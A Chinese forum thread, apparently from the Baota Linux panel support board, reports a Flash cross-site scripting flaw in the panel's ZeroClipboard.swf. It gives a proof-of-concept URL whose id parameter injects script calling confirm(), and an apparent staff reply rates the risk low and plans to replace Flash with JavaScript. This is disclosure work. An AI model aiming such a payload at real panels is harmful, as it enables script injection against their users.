当前位置:论坛首页 > Linux面板 > 求助

【已解决】通用型Flash xss漏洞

发表在 Linux面板2018-7-24 21:03 [复制链接] 2 2358

http://****:8888/static/js/ZeroClipboard.swf?id=\%22))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
使用道具 举报 只看该作者 回复
发表于 2018-7-25 07:50:33 | 显示全部楼层
如果有 官方尽快修复吧
使用道具 举报 回复 支持 反对
发表于 2018-7-25 14:50:24 | 显示全部楼层
风险较低,可以忽略。不过为了避嫌,还是取消那个flash 换成js来实现。

这个漏洞只要有flash都会有,但是利用条件非常非常非常高,需要满足无数多的条件,如果有精力搞这个,肯定不如搞其他来的快,就像如果你有一把冲锋枪的话不会拿冲锋枪去抢路人的10元钱,而是直接冲着银行去。
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表